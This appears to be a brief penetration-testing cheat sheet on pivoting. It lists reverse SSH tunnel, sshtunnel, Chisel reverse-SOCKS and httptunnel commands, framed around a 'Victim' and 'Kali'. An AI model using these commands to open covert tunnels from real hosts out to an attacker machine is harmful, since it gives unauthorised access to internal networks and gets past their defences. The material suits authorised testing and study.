Tools
SSHtunnel
ssh user@ip -R 2200:127.0.0.1:22 -f -N
sshtunnel -r user@127.0.0.1:2200 10.1.1.0/24
Chisel
chisel server --port 8008 --reverse --socks
chissel client http://IP:8008 R:5000:socks R:2200:127.0.01:22/tcp
HTTPTunnel
apt install httptunnel
Victim:
Kali:
Last updated